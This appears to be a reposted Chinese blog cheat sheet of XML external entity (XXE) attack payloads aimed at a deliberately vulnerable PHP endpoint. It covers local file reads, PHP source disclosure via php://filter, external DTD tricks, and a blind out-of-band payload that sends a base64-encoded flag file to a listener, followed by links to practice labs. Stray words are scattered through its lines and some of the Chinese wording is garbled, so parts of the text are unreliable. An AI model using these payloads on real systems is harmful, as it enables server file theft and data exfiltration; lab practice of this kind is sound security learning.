XXE_payload

时间  2020-05-30
标签 xxe payload 繁體版
原文   原文链接 
<?php
    $xmlfile = file_get_contents('php://input');
    $creds=simplexml_load_string($xmlfile);
    echo $creds;
?>

1 回显的类型

1.1

POC:php

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]> 
<creds>&goodies;</creds>

1.2

与1.1不同的是,引入的外部的dtdhtml

POC:python

**********
post提交的数据:
<?xml version="1.0"?> 
<!DOCTYPE creds  SYSTEM "http://127.0.0.1/test/evil.dtd">
<creds>&b;</creds>
**********
http://127.0.0.1/test/evil.dtd的数据
<!ENTITY b SYSTEM "file:///c:/windows/system.ini">

1.3

********
post:
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY % goodies SYSTEM "http://127.0.0.1/test/evil.dtd"> 
%goodies;
]> 
<creds>&b;</creds>
********
evil.dtd
<!ENTITY b SYSTEM "file:///c:/windows/system.ini">

1.4

<table><tr><td bgcolor=orange>当里面含有<,&时候,上边的方法用file协议读不出文件</td></tr></table>git

1.41

若是是php的话,能够用php的filter协议直接读出文件github

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]> 
<creds>&goodies;</creds>

1.42

<![CDATA["和 “]]> 拼接引用的内容,就能够正常输出 web

**********
post提交的数据:
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">   
<!ENTITY % goodies SYSTEM "file:///C:/softeware/phpstudy/PHPTutorial/WWW/test/index.php">  
<!ENTITY % end "]]>">  
<!ENTITY % dtd SYSTEM "http://127.0.0.1/test/evil.dtd"> 
%dtd; ]> 

<roottag>&all;</roottag>
*********
evil.dtd的内容
<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

2 无回显

2.1

**********
post:
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://127.0.0.1/test/evil.dtd">
%remote;%int;%send;
]>
**********
evil.dtd的内容
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/test/flag.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://127.0.0.1:9999?p=%file;'>">
***********
python3 -m http.server 9999

3总结一下本身老出错的地方

最后引用实体的时候,老忘了打分号。<creds>&goodies;</creds>windows

没有回显的时候,要注意用filter结合file的绝对路径post

filter能够不用绝对路径,可是有时候你是访问你的index.html,php文件不必定是index.php。spa

靶场练习;code

https://github.com/c0ny1/xxe-lab

http://web.jarvisoj.com:9882/

每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程